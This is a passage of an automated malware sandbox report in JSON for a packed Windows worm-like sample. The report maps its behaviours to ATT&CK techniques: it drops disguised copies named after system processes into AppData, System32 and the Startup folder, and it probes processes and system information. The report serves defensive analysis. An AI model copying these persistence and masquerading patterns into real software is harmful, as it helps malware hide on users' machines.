"origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"4k51k4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"356\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"396\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"404\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"460\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"496\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"512\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"520\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"612\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"688\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"776\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"832\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"868\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"896\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1120\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1272\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1308\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1428\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1544\"}\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1632\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"\\Device\\KsecDD\"\n \"4k51k4.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199\" has an entrypoint in section \"UPX1\"\n \"services.exe\" has an entrypoint in section \"UPX1\"\n \"shell.exe\" has an entrypoint in section \"UPX1\"\n \"4k51k4.exe\" has an entrypoint in section \"UPX1\"\n \"CSRSS .exe\" has an entrypoint in section \"UPX1\"\n \"New Folder.exe\" has an entrypoint in section \"UPX1\"\n \"Data HAPUBWS.exe\" has an entrypoint in section \"UPX1\"\n \"Empty.pif\" has an entrypoint in section \"UPX1\"\n \"WINLOGON.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"SERVICES.EXE\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C456.bin\" has an entrypoint in section \"UPX1\"\n \"SMSS.EXE\" has an entrypoint in section \"UPX1\"\n \"LSASS.EXE\" has an entrypoint in section \"UPX1\"\n \"MrHelloween.scr\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C711.bin\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C458.bin\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46908 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46857 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46816 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46937 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46932 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46758 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46939 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46836 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46838 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46930 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46838 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46868 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46889 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46746 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46772 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46962 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46723 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46911 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46834 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46831 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46920 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46795 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46739 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46877 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46833 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46900 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46869 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46882 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46779 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46781 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46896 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46958 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46756 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 46983 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46890 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46863 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46819 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46808 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46832 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46775 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46928 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"4k51k4.exe\" wrote 46818 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 